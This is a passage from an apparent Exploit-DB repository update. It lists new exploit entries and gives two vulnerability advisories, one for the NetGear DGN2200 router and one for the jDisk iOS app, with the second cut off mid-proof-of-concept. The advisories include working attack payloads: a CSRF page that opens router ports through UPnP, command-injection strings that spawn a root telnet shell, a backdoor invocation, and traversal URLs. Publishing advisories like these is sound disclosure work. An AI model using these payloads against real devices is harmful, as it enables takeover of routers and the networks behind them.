From 7ea8fca520f1de36ebe0aa9181f52e6034de24c8 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 14 Feb 2014 04:27:08 +0000
Subject: [PATCH] Updated 02_14_2014

---
 files.csv                            |  24 ++
 platforms/hardware/webapps/31617.txt | 475 +++++++++++++++++++++++++++
 platforms/hardware/webapps/31618.txt | 302 +++++++++++++++++
 platforms/java/webapps/31621.txt     |   9 +
 platforms/multiple/dos/31615.rb      | 109 ++++++
 platforms/osx/dos/31619.ics          |  50 +++
 platforms/osx/dos/31620.ics          |  68 ++++
 platforms/php/webapps/31616.txt      |   9 +
 platforms/php/webapps/31622.txt      |   9 +
 platforms/php/webapps/31623.txt      |  13 +
 platforms/php/webapps/31625.txt      |  10 +
 platforms/php/webapps/31626.txt      |  11 +
 platforms/php/webapps/31628.txt      |   9 +
 platforms/php/webapps/31631.txt      |   9 +
 platforms/php/webapps/31633.html     |   7 +
 platforms/php/webapps/31636.txt      |   9 +
 platforms/php/webapps/31637.txt      |   9 +
 platforms/php/webapps/31639.txt      |   9 +
 platforms/php/webapps/31640.txt      |   9 +
 platforms/unix/dos/31627.c           |  49 +++
 platforms/unix/remote/31634.py       |  71 ++++
 platforms/windows/dos/31635.py       |  81 +++++
 platforms/windows/remote/31624.txt   |  11 +
 platforms/windows/remote/31632.txt   |   9 +
 platforms/windows/remote/31638.txt   |  11 +
 25 files changed, 1382 insertions(+)
 create mode 100755 platforms/hardware/webapps/31617.txt
 create mode 100755 platforms/hardware/webapps/31618.txt
 create mode 100755 platforms/java/webapps/31621.txt
 create mode 100755 platforms/multiple/dos/31615.rb
 create mode 100755 platforms/osx/dos/31619.ics
 create mode 100755 platforms/osx/dos/31620.ics
 create mode 100755 platforms/php/webapps/31616.txt
 create mode 100755 platforms/php/webapps/31622.txt
 create mode 100755 platforms/php/webapps/31623.txt
 create mode 100755 platforms/php/webapps/31625.txt
 create mode 100755 platforms/php/webapps/31626.txt
 create mode 100755 platforms/php/webapps/31628.txt
 create mode 100755 platforms/php/webapps/31631.txt
 create mode 100755 platforms/php/webapps/31633.html
 create mode 100755 platforms/php/webapps/31636.txt
 create mode 100755 platforms/php/webapps/31637.txt
 create mode 100755 platforms/php/webapps/31639.txt
 create mode 100755 platforms/php/webapps/31640.txt
 create mode 100755 platforms/unix/dos/31627.c
 create mode 100755 platforms/unix/remote/31634.py
 create mode 100755 platforms/windows/dos/31635.py
 create mode 100755 platforms/windows/remote/31624.txt
 create mode 100755 platforms/windows/remote/31632.txt
 create mode 100755 platforms/windows/remote/31638.txt

diff --git a/files.csv b/files.csv
index bd4b28e43..4e5a32781 100755
--- a/files.csv
+++ b/files.csv
@@ -28399,3 +28399,27 @@ id,file,description,date,author,platform,type,port
 31611,platforms/php/webapps/31611.txt,"RobotStats 0.1 robotstats.inc.php DOCUMENT_ROOT Parameter Remote File Inclusion",2008-04-04,ZoRLu,php,webapps,0
 31613,platforms/osx/remote/31613.ics,"Apple iCal 3.0.1 'COUNT' Parameter Integer Overflow Vulnerability",2008-04-21,"Core Security Technologies",osx,remote,0
 31614,platforms/php/webapps/31614.txt,"Tiny Portal 1.0 'shouts' Cross-Site Scripting Vulnerability",2008-04-04,Y433r,php,webapps,0
+31615,platforms/multiple/dos/31615.rb,"Apache Commons FileUpload and Apache Tomcat Denial-of-Service",2014-02-12,"Trustwave's SpiderLabs",multiple,dos,0
+31616,platforms/php/webapps/31616.txt,"Web Server Creator 0.1 'langfile' Parameter Remote File Include Vulnerability",2008-04-04,ZoRLu,php,webapps,0
+31617,platforms/hardware/webapps/31617.txt,"NetGear DGN2200 N300 Wireless Router - Multiple Vulnerabilities",2014-02-12,"Andrew Horton",hardware,webapps,0
+31618,platforms/hardware/webapps/31618.txt,"jDisk (stickto) v2.0.3 iOS - Multiple Vulnerabilities",2014-02-12,Vulnerability-Lab,hardware,webapps,0
+31619,platforms/osx/dos/31619.ics,"Apple iCal 3.0.1 'TRIGGER' Parameter Denial of Service Vulnerability",2008-04-21,"Rodrigo Carvalho",osx,dos,0
+31620,platforms/osx/dos/31620.ics,"Apple iCal 3.0.1 'ATTACH' Parameter Denial Of Service Vulnerability",2008-04-21,"Core Security Technologies",osx,dos,0
+31621,platforms/java/webapps/31621.txt,"Sun Java System Messenger Express 6.1-13-15 'sid' Cross-Site Scripting Vulnerability",2008-04-07,syniack,java,webapps,0
+31622,platforms/php/webapps/31622.txt,"URLStreet 1.0 'seeurl.php' Multiple Cross-Site Scripting Vulnerabilities",2008-04-07,ZoRLu,php,webapps,0
+31623,platforms/php/webapps/31623.txt,"Wikepage Opus 13 2007.2 'index.php' Multiple Directory Traversal Vulnerabilities",2008-04-07,A.nosrati,php,webapps,0
+31624,platforms/windows/remote/31624.txt,"Microsoft Internet Explorer 7.0 Header Handling 'res://' Information Disclosure Vulnerability",2008-04-07,"The Hacker Webzine",windows,remote,0
+31625,platforms/php/webapps/31625.txt,"Prozilla Gaming Directory 1.0 SQL Injection Vulnerability",2008-04-05,t0pP8uZz,php,webapps,0
+31626,platforms/php/webapps/31626.txt,"Prozilla Software Index 1.1 SQL Injection Vulnerability",2008-04-05,t0pP8uZz,php,webapps,0
+31627,platforms/unix/dos/31627.c,"LICQ <= 1.3.5 File Descriptor Remote Denial of Service Vulnerability",2008-04-08,"Milen Rangelov",unix,dos,0
+31628,platforms/php/webapps/31628.txt,"Swiki 1.5 HTML Injection and Cross-Site Scripting Vulnerabilities",2008-04-08,"Brad Antoniewicz",php,webapps,0
+31631,platforms/php/webapps/31631.txt,"Pragmatic Utopia PU Arcade <= 2.2 'gid' Parameter SQL Injection Vulnerability",2008-04-09,MantiS,php,webapps,0
+31632,platforms/windows/remote/31632.txt,"Microsoft SharePoint Server 2.0 Picture Source HTML Injection Vulnerability",2008-04-09,OneIdBeagl3,windows,remote,0
+31633,platforms/php/webapps/31633.html,"phpBB Fishing Cat Portal Addon 'functions_portal.php' Remote File Include Vulnerability",2008-04-09,bd0rk,php,webapps,0
+31634,platforms/unix/remote/31634.py,"Python zlib Module Remote Buffer Overflow Vulnerability",2008-04-09,"Justin Ferguson",unix,remote,0
+31635,platforms/windows/dos/31635.py,"WinWebMail 3.7.3 IMAP Login Data Handling Denial Of Service Vulnerability",2008-04-10,ryujin,windows,dos,0
+31636,platforms/php/webapps/31636.txt,"W2B phpHotResources 'cat.php' SQL Injection Vulnerability",2008-04-11,The-0utl4w,php,webapps,0
+31637,platforms/php/webapps/31637.txt,"W2B Dating Club 'browse.php' SQL Injection Vulnerability",2008-04-11,The-0utl4w,php,webapps,0
+31638,platforms/windows/remote/31638.txt,"HP OpenView Network Node Manager 7.x (OV NNM) OpenView5.exe Action Parameter Traversal Arbitrary File Access",2008-04-11,"Luigi Auriemma",windows,remote,0
+31639,platforms/php/webapps/31639.txt,"Trillian 3.1.9 DTD File XML Parser Buffer Overflow Vulnerability",2008-04-11,david130490,php,webapps,0
+31640,platforms/php/webapps/31640.txt,"osCommerce Poll Booth 2.0 Add-On 'pollbooth.php' SQL Injection Vulnerability",2008-04-13,S@BUN,php,webapps,0
diff --git a/platforms/hardware/webapps/31617.txt b/platforms/hardware/webapps/31617.txt
new file mode 100755
index 000000000..6cb594b38
--- /dev/null
+++ b/platforms/hardware/webapps/31617.txt
@@ -0,0 +1,475 @@
+Title: Multiple vulnerabilities in NETGEAR N300 WIRELESS ADSL2+ MODEM ROUTER DGN2200
+====================================================================================
+
+	Notification Date:	11 February 2014
+	Affected Vendor:	NetGear
+	Affected Hardware:	NetGear DGN2200 N300 Wireless ADSL2+ Modem Router
+	Firmware Version:	V1.0.0.36-7.0.37
+	Issue Types:		* Command Injection
+						* Cross-site Request Forgery
+						* UPNP Exploitation through Cross-site Request Forgery
+						* Insecure FTP Root
+						* Cannot Disable WPS
+						* Passwords Stored in Plaintext
+						* Information Disclosure
+						* Firmware Update MITM
+	Advisory Code:		AIS-2014-003
+	Discovered by:		Andrew Horton
+	Issue status:		No patch available - product beyond End of Life
+
+
+Summary
+=======
+BAE Systems Applied Intelligence researcher, Andrew Horton has identified that the NetGear N300 Wireless ADSL 2+ Modem Router model DGN2200 suffers from multiple vulnerabilities which may be exploited by both local and remote attackers. This enables an attacker to completely compromise the device and stage further attacks against the local network and internet.
+
+NetGear have indicated that this product is beyond its end of life and therefore these vulnerabilities will not be patched. As a result, BAE Systems have delayed release of this advisory for over 12 months to reduce the likelihood of active exploitation. 
+
+
+1.	UPNP Vulnerable to CSRF
+===========================
+
+Requires
+--------
+Luring an unauthenticated or authenticated user to an attacker-controlled webpage.
+
+
+Description
+-----------
+The Universal Plug and Play (UPNP) implementation used by NetGear accepts an HTTP POST request as a valid XML request, rendering the UPNP service vulnerable to inter-protocol Cross-Site Request Forgery attacks. This can be used to bypass or alter firewall rules.
+
+The UPNP interface of the router listens on TCP port 5000 and can only be accessed from the LAN side of the device. UPNP requests do not require authentication with passwords. This vulnerability exists because the request is initiated by a user's browser on the LAN side of the device.
+
+
+Impact
+------
+Using this vulnerability, BAE Systems was able to add new firewall rules to enable internet access to the insecure telnet port and the admin web interface.
+
+
+Proof of concept
+----------------
+The following webpage will make telnet for the router accessible to the internet so that it may be attacked using the GearDog  backdoor (See issue 5). The GearDog backdoor is a known remote access backdoor implemented in many NetGear products. This requires brute-forcing the MAC address.
+
+	<html>
+	<form action="http://192.168.0.1:5000/Public_UPNP_C3" method="post" ENCTYPE="text/plain">
+	<textarea id="1" name="1"><?xml version="1.0"?>
+	<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
+	<SOAP-ENV:Body>
+	.<m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1">
+	<NewPortMappingDescription>hax3</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration><NewInternalClient>192.168.0.1</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>887</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>23</NewInternalPort>
+	.</m:AddPortMapping>
+	</SOAP-ENV:Body>
+	</SOAP-ENV:Envelope>&lt;/textarea&gt;
+	<input type="submit" >
+	</form>
+	<script> document.forms[0].submit();</script>
+	</html>  
+
+Note: 192.168.0.1 is the default LAN IP address. Port 23 is the internal port number and port 887 is the external port number to be opened.
+
+
+Solution
+--------
+Ensure that UPNP requests sent through HTTP POST parameters are not honoured.
+
+
+
+2.	Command Execution with Ping
+===============================
+
+Requires
+--------
+Authenticated access to the web administration interface.
+
+
+Description
+-----------
+The ping function available through the web interface is vulnerable to operating system command injection. An attacker with authenticated web user access can gain OS command execution privileges which can be leveraged to backdoor the router, intercept and modify internet traffic, and access connected devices.
+
+
+Impact
+------
+Using this vulnerability, BAE Systems was able to execute arbitrary commands on the underlying Linux operating system  as the root user.
+
+
+Proof of concept
+----------------
+Example exploitation to obtain a file and directory listing:
+
+	POST /ping.cgi HTTP/1.1
+	Host: 192.168.0.1
+	Proxy-Connection: keep-alive
+	Content-Length: 81
+	Cache-Control: max-age=0
+	Authorization: Basic YWRtaW46YXBwbGU3ODE=
+	Origin: http://192.168.0.1
+	User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4
+	Content-Type: application/x-www-form-urlencoded
+	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+	Referer: http://192.168.0.1/DIAG_diag.htm
+	Accept-Encoding: gzip,deflate,sdch
+	Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
+	Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
+
+	IPAddr1=a&IPAddr2=b&IPAddr3=c&IPAddr4=d&ping=xxxx&ping_IPAddr=|ls
+
+To get an interactive shell, 
+
+1. Send the following POST data:
+IPAddr1=a&IPAddr2=b&IPAddr3=c&IPAddr4=d&ping=xxxx&ping_IPAddr=|/usr/sbin/telnetd -p 90 -l /bin/sh
+2. Telnet to port 90
+
+
+Solution
+--------
+Validate untrusted user input using a whitelist of acceptable values. For example, IPv4 address values may only include the digits '0' through '9', and full stops ('.')
+
+
+
+3.	Blind Command Execution with DNS Lookup
+===========================================
+
+Requires
+--------
+Authenticated access to the web administration interface.
+
+
+Description
+-----------
+The DNS lookup function available through the web interface is vulnerable to operating system command injection. An attacker with authenticated web user access can gain OS command execution privileges which can be leveraged to backdoor the router, intercept and modify internet traffic, and access connected devices.
+
+
+Impact
+------
+Using this vulnerability, BAE Systems was able to execute arbitrary commands on the underlying Linux operating system but was unable to see the response.
+
+
+Proof of concept
+----------------
+Example exploitation demonstrating the issue through use of the ?sleep? command to delay the response from the server:
+
+	POST /dnslookup.cgi HTTP/1.1
+	Host: 192.168.0.1
+	Proxy-Connection: keep-alive
+	Content-Length: 32
+	Cache-Control: max-age=0
+	Authorization: Basic YWRtaW46YXBwbGU3ODE=
+	Origin: http://192.168.0.1
+	User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4
+	Content-Type: application/x-www-form-urlencoded
+	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+	Referer: http://192.168.0.1/DIAG_diag.htm
+	Accept-Encoding: gzip,deflate,sdch
+	Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
+	Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
+
+	host_name=|sleep 5&lookup=Lookup
+
+To get an interactive shell, 
+
+1.	Send the following POST data:
+hostname=|/usr/sbin/telnetd -p 90 -l /bin/sh&lookup=Lookup
+2.	Telnet to port 90
+
+
+Solution
+--------
+Validate untrusted user input using a whitelist of acceptable values. For example, hostname values may only contain uppercase or lowercase ASCII letters, the digits '0' through '9', full stops (?.?) and hyphens ('-').
+
+
+
+4.	No Cross-Site Request Forgery (CSRF) Protection
+===================================================
+
+Requires
+--------
+Luring a logged in admin user into following a malicious link	
+
+
+Description
+-----------
+An attacker can lure a user into following an untrusted link to a malicious webpage that will exploit the lack of CSRF protection by forcing the user's web browser to perform unwanted actions, such as altering firewall rules. This attack returns no information to the attacker, so it is effectively 'blind', however this does not detract from the threat.
+
+The command execution vulnerabilities described above can be performed through CSRF.
+
+
+Impact
+------
+Using this vulnerability, BAE Systems was able to update configuration of the device, including changing WPA keys, alter firewall rules and perform command execution through exploitation of the ping and DNS features.
+
+
+Solution
+--------
+Include an anti-CSRF token in all web forms and ensure that the token is present and correct when HTTP requests for actions are received.
+
+
+
+5.	Gearguy/Geardog Telnet Backdoor
+===================================
+
+Requires
+--------
+Ability to telnet to port 23 (only on LAN side by default)	
+
+
+Description
+-----------
+There is a backdoor (feature) built into many NetGear devices, where a user can gain operating system command access without requiring a password. This issue has been previously reported in other NetGear devices. 
+
+NetGear provides a windows executable to do this. A Linux client is available from http://code.google.com/p/netgear-telnetenable/
+
+Send a Blowfish encrypted message to port 23 from the LAN. When you reconnect, it provides a shell without a password required.
+
+
+Impact
+------
+Using this vulnerability, BAE Systems was able to gain a root shell on the underlying Linux operating system without supplying any authentication credentials. This would allow complete device compromise, which can be leveraged to backdoor the router, intercept and modify internet traffic, and access connected devices.
+
+
+Proof of concept
+----------------
+python telnet-enabler.py 192.168.0.1 "204E7F2172C8" Gearguy Geardog
+Sent telnet enable payload to '192.168.0.1:23'
+
+
+Solution
+--------
+Remove the backdoor feature from the device. If a ?last resort? admin console or reset function is required, implement it to require interaction with the device so that only a person with physical access to the device is able to use this function.
+
+
+
+6.	FTP Insecure Root Directory
+===============================
+
+Requires
+--------
+FTP to be enabled (not enabled by default)
+
+
+Description
+-----------
+The FTP server allows a user to access configuration files and to traverse outside the folder that contains files intended to be shared by FTP.
+It is possible to list and retrieve files in the / folder, however the user is restricted from using the cd or CWD command to change the current directory to '/'.
+
+
+Impact
+------
+Using this vulnerability, BAE Systems was able to gain access to sensitive configuration files.
+
+
+Proof of concept
+----------------
+	root@bt# ftp 192.168.0.1
+	Connected to 192.168.0.1.
+	230 User logged in.
+	Name (192.168.0.1:root): ftp
+	230 User logged in.
+	Remote system type is UNIX.
+	Using binary mode to transfer files.
+	ftp> ls 
+	200 PORT 192.168.0.6:49211 OK
+	150 BINARY data connection established.
+	lrwxrwxrwx   1 nobody   root     18 Jan 01  2003 USB_Storage
+	226 Directory list has been submitted.
+	ftp> cd /
+  550 Error: Access Denied.
+	ftp> ls /
+	200 PORT 192.168.0.6:55927 OK
+	150 BINARY data connection established.
+	-rw-r--r--   1 nobody   root     2 Jan 01  2003 all_no_password
+	-rw-r--r--   1 nobody   root     1700 Jan 01  2003 bftpd.conf
+	drwxr-xr-x   3 nobody   root     0 Jan 01  2003 conf
+	-rw-r--r--   1 nobody   root     2 Jan 01  2003 lan3_time
+	-r--r--r--   1 nobody   root     1430 Jan 01  2003 lan_dev
+	-rw-r--r--   1 nobody   root     2 Jan 01  2003 lan_time
+	drwxr-xr-x  48 nobody   root     0 Jan 01  2003 mnt
+	-rw-r--r--   1 nobody   root     1 Jan 01  2003 opendns.flag
+	-rw-r--r--   1 nobody   root     0 Jan 01  2003 opendns.tbl
+	-rw-r--r--   1 nobody   root     0 Jan 01  2003 opendns_auth.tbl
+	drwxr-xr-x   2 nobody   root     0 Jan 01  2003 ppp
+	-rw-r--r--   1 nobody   root     38 Jan 01  2003 resolv.conf
+	-rw-r--r--   1 nobody   root     208 Jan 01  2003 ripd.conf
+	drwxr-xr-x   4 nobody   root     0 Jan 01  2003 samba
+	drwxr-xr-x   2 nobody   root     0 Jan 01  2003 shares
+	-rw-r--r--   1 nobody   root     262 Jan 01  2003 space_info
+	-rw-------   1 nobody   root     2 Oct 14 14:15 timesync
+	-rw-r--r--   1 nobody   root     242 Jan 01  2003 udhcpd.conf
+	-rw-r--r--   1 nobody   root     0 Jan 01  2003 udhcpd.leases
+	-rw-r--r--   1 nobody   root     4 Jan 01  2003 udhcpd.pid
+	-rw-r--r--   1 nobody   root     2 Jan 01  2003 udhcpd_resrv.conf
+	-rw-r--r--   1 nobody   root     3562 Jan 01  2003 upnp_xml
+	drwxr-xr-x   2 nobody   root     0 Jan 01  2003 usb_vol_name
+	drwxr-xr-x  11 nobody   root     0 Jan 01  2003 var
+	-r--r--r--   1 nobody   root     1922 Jan 01  2003 wan_dev
+	-rw-r--r--   1 nobody   root     3 Jan 01  2003 wan_time
+	drwxr-xr-x   2 nobody   root     0 Jan 01  1999 wlan
+	-rw-r--r--   1 nobody   root     2 Jan 01  2003 wlan_time
+	-rw-r--r--   1 nobody   root     0 Jan 01  2003 zebra.conf
+	226 Directory list has been submitted.
+	ftp> 
+  ftp> get /bftpd.conf 
+  local: ./bftpd.conf remote: /bftpd.conf
+  200 PORT 192.168.0.5:53750 OK
+  150 BINARY data connection established.
+  226 File transmission successful.
+  1454 bytes received in 0.00 secs (3256.7 kB/s)
+
+
+Solution
+--------
+Enforce the folder restriction to the /shares folder for all FTP commands.
+
+
+
+7.	Cannot Disable WPS
+======================
+
+Requires
+--------
+Local proximity and WiFi enabled
+
+
+Description
+-----------
+Wi-Fi Protected Setup (WPS) is an insecure protocol vulnerable to bruteforce attacks due to design vulnerabilities. The NetGear device does not provide an effective method to disable WPS. An attacker with local proximity to the device while WiFi is enabled, can bruteforce WPS, and obtain the WPA key which allows an attacker to connect to the WiFi access point, and decrypt WiFi traffic from other users. 
+
+Software such as Reaver, can be used to brute-force the WPS key, usually within about ten hours. Reaver is available from http://code.google.com/p/reaver-wps.
+
+The 'Advanced Wireless Settings' page contains the following section:
+	WPS Settings
+	Router's PIN:	99999999
+	[Tickbox] Disable Router's PIN 
+	[Tickbox] Keep Existing Wireless Settings
+
+	Ticking the 'Disable Router's PIN' box appears to have no effect.
+
+
+Impact
+------
+Using this vulnerability, BAE Systems was able to crack the wireless password, and gain access to the WPA2 PSK wireless network hosted by the device.
+
+
+Proof of concept
+----------------
+This vulnerability can be exploited with the Reaver tool available from http://code.google.com/p/reaver-wps/.
+
+
+Solution
+--------
+Implement a method for users to easily and effectively disable WPS.
+
+
+
+8.	Passwords Stored in Plaintext
+=================================
+
+Requires
+--------
+Telnet access or exploitation of a vulnerability providing command execution
+
+
+Description
+-----------
+The router stores passwords in the /etc/passwd file in plaintext instead of using encrypted hashes.
+
+
+Impact
+------
+Using this vulnerability, BAE Systems was able to learn the passwords used to access the device. 
+
+
+Proof of concept
+----------------
+# cat /etc/passwd
+nobody:*:0:0:nobody:/:/bin/sh
+admin:s3cr3tp4ssw0rd:0:0:admin:/:/bin/sh
+guest:guest:0:0:guest:/:/bin/sh
+
+
+Solution
+--------
+Store user passwords as a non-reversible cryptographic hash, such as SHA-256.
+
+
+
+9.	Pre-Authentication Information Disclosure
+=============================================
+
+Requires
+--------
+Unauthenticated access to the web interface
+
+
+Description
+-----------
+This issue has been previously reported in other NetGear devices and is the same issue reported here: 
+* http://websec.mx/advisories/view/Revelacion_de_informacion_en_Netgear
+
+
+Impact
+------
+Using this vulnerability, BAE Systems was able to learn some identifying features of the device without needing to provide credentials.
+
+
+Proof of concept
+----------------
+URL: http://192.168.0.1/currentsetting.htm
+Firmware=V1.0.0.36_7.0.36
+RegionTag=DGN2200_WW
+Region=ww
+Model=DGN2200
+InternetConnectionStatus=Up
+ParentalControlSupported=1
+
+
+Solution
+--------
+Restrict access to webpages containing sensitive functionality or data to authenticated users.
+
+
+
+10.	Firmware Update Vulnerable to Man In The Middle
+===================================================
+
+Requires
+--------
+Control of the user?s network, for example at the ISP level or local network.
+
+
+Description
+-----------
+Each time an admin logs into the web interface, the web interface attempts to find new firmware on an FTP server.
+
+FTP is an insecure protocol that is vulnerable to man-in-the-middle attacks. An attacker could provide a backdoored version of the firmware.
+
+Updates are sourced from: ftp://14.0.34.208/dgn2200/ww/
+
+
+Impact
+------
+Using this vulnerability, BAE Systems was able to provide a malicious firmware image to the router.
+
+
+Solution
+--------
+Retrieve updates using a protocol with SSL/TLS with certificate validation.
+Apply a public key signature to firmware images and check them before usage.
+
+
+
+End User Recommendation
+=======================
+Replace your NetGear router with a more recent model that can receive updated firmware.
+
+
+Disclosure Time-Line
+====================
+29/11/2012	-	Vendor notified
+6/12/2012	-	Vendor acknowledges vulnerabilities but advises that the product is beyond its end of life and will not be patched
+11/2/2014	-	Advisory released
+
+
+Contact
+====================
+Advisory URL: http://www.baesystemsdetica.com.au/Research/Advisories/NETGEAR-DGN2200-Multiple-Vulnerabilities-%28AIS-2014
+
+Website: www.baesystems.com
diff --git a/platforms/hardware/webapps/31618.txt b/platforms/hardware/webapps/31618.txt
new file mode 100755
index 000000000..abc71bcb5
--- /dev/null
+++ b/platforms/hardware/webapps/31618.txt
@@ -0,0 +1,302 @@
+Document Title:
+===============
+jDisk (stickto) v2.0.3 iOS - Multiple Web Vulnerabilities
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1196
+
+
+Release Date:
+=============
+2014-02-12
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1196
+
+
+Common Vulnerability Scoring System:
+====================================
+9.4
+
+
+Product & Service Introduction:
+===============================
+jDisk turns your iPhone`iPad`iPod into a flash drive / disk. jDisk provides a purely web-based management UI, what you 
+need do is visit it in your browser, no client installation is needed. What`s more, jDisk embeds a native file manager, 
+you can organize your files/folders on your device directly, open files, edit them, preview them, etc. All in all, jDisk 
+empowers your iPhone/iPad, make it work as a moving disk / flash drive.
+
+(Copy of the Homepage: https://itunes.apple.com/de/app/jdisk-convert-your-device/id604793088 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official sticktos jDisk v2.0.3 iOS mobile web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2014-02-12:    Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Apple AppStore
+Product: jDisk (stickto) iOS - Mobile Web Application 2.0.3
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Critical
+
+
+Technical Details & Description:
+================================
+1.1
+Multiple remote code execution web vulnerabilities has been discovered in the official sticktos jDisk v2.0.3 iOS mobile web-application.
+The vulnerability allows remote attackers to execute unauthorized system specific codes or commands to compromise the affected system/service.
+
+The vulnerabilities are located in the `New+ Text file` and `New+ Folder` function of the jdisk wifi application file manager web-interface. 
+Remote attackers are able to inject own system specific codes by manipulation of the folder- & file name value in the add procedure. 
+The code execution occurs in the main file dir index and sub category listing, the add new edit file but also in the the app status 
+notification message context. The security risk of the remote code execution vulnerabilities in the add new folder- & text file function 
+are estimated as critical with a cvss (common vulnerability scoring system) count of 9.4(+)|(-)9.5.
+
+Exploitation of the code execution vulnerability requires no user interaction or privileged mobile web-application user account with password. 
+Successful exploitation of the remote code execution vulnerabilities results in mobile application or connected device component compromise.
+
+Request Method(s):
+				[+] [POST]
+
+Vulnerable Module(s):
+				[+] New/Add Folder
+				[+] New/Add Text File
+
+Vulnerable Parameter(s):
+				[+] folder name
+				[+] text-file name
+
+Affected Module(s):
+				[+] Index & Sub Category - File Dir Listing
+				[+] Notification Message
+				[+] File Edit - Header
+
+
+1.2
+A directory-traversal web vulnerability has been discovered in the official sticktos jDisk v2.0.3 iOS mobile web-application.
+The vulnerability allows remote attackers to unauthorized access system path variables or web-server data to compromise the application.
+
+The local vulnerability is located in the `folderContent to folder` value of the mobile application. Remote attackers can exploit the bug 
+by usage of a manipulated GET method request to unauthorized access app/device paths or folders. The local issue is a classic directory-traversal 
+web vulnerability. The execution of the malicious dt string in the foldercontent to folder path request occurs in the context of the requested 
+interface page itself. The security risk of the directory traversal web vulnerability is estimated as high(-) with a cvss (common vulnerability 
+scoring system) count of 6.6(+)|(-)6.7.
+
+Exploitation of the directory traversal web vulnerability requires no user interaction or privileged mobile web-application user account with password. 
+Successful exploitation of the path traversal web vulnerability results in mobile application or connected device component compromise.
+
+Request Method(s):
+				[+] [GET]
+
+Vulnerable Module(s):
+				[+] __FD__?action
+
+Vulnerable Parameter(s):
+				[+] folderContent&folder=
+
+Affected Module(s):
+				[+] Index & Sub Category - File Dir Listing
+
+
+
+1.3
+A local file include web vulnerability has been discovered in the official sticktos jDisk v2.0.3 iOS mobile web-application.
+The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system 
+specific path commands to compromise the web-application or mobile device.
+
+The web vulnerability is located in the `file name` value of the `Upload > Uplaod Files` module POST method request. Remote attackers 
+are able to inject own files with malicious filename to compromise the mobile application. The attack vector is persistent and the 
+request method is POST. The local file/path include execution occcurs in the main file dir index- or sub category item listing of 
+the file manager. The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability 
+scoring system) count of 8.3(+)|(-)8.4.
+
+Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account 
+with password. Successful exploitation of the local web vulnerability results in mobile application or connected device component 
+compromise by unauthorized local file include web attacks.
+
+Request Method(s):
+				[+] [POST]
+
+Vulnerable Input(s):
+				[+] Upload > Upload Files
+
+Vulnerable Parameter(s):
+				[+] filename
+
+Affected Module(s):
+				[+] Index File Dir Item Listing
+				[+] Sub Category File Dir Item Listing
+
+
+Proof of Concept (PoC):
+=======================
+1.1
+The remote code execution can be exploited by remote attackers without privileged web-application user account or user interaction.
+For security demonstration or to reproduce the security vulnerability follow the provided information and steps below.
+
+--- PoC Session Logs [POST] ---
+Status: 200[OK]
+POST http://localhost:12345/__FD__?action=saveFile&path=[VULNERABLE CODE EXECUTION VALUE!] Load Flags[LOAD_BYPASS_CACHE  LOAD_BACKGROUND  ] Gr??e des Inhalts[86] Mime Type[text/html]
+   Request Header:
+      Host[localhost:12345]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Content-Type[application/json; charset=UTF-8]
+      X-Requested-With[XMLHttpRequest]
+      Referer[http://localhost:12345/]
+      Content-Length[14]
+      Cookie[jtable%2376270709page-size=10]
+      Connection[keep-alive]
+      Pragma[no-cache]
+      Cache-Control[no-cache]
+   POST-Daten:
+      {"content":"&path=[VULNERABLE CODE EXECUTION VALUE!]"}[]
+   Response Header:
+      Accept-Ranges[bytes]
+      Content-Length[86]
+      Content-Type[text/html]
+      Date[Tue, 11 Feb 2014 23:11:06 GMT]
+
+
+1.2
+The directory-traversal vulnerability can be exploited by remote attackers without user interaction or privileged web-application user account.
+For security demonstration or to reproduce the security vulnerability follow the provided information and steps below.
+
+PoC: 
+http://localhost:12345/__FD__?action=folderContent&folder=%20%2F..%2F..%2F[DIRECTORY TRAVERSAL WEB VULNERABILITY!]&_dc=1392159953825
+
+#{"msg":"","success":true,"data":[{"name":"%20%2F..%2F..%2F[DIRECTORY TRAVERSAL WEB VULNERABILITY!]","id":"/%20%2F..%2F..%2F[DIRECTORY TRAVERSAL WEB VULNERABILITY!]","type":"file",
+"size":24386,"changed":"2014-02-12 00:13:49","created":"2014-02-12 00:13:49"}]}
+
+--- PoC Session Logs [GET] ---
+Status: 200[OK]
+GET http://localhost:12345/__FD__?action=folderContent&folder=%20%2F..%2F..%2F[DIRECTORY TRAVERSAL WEB VULNERABILITY!]&_dc=1392159953825 Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Gr??e des Inhalts[35] Mime Type[text/html]
+   Request Header:
+      Host[localhost:12345]
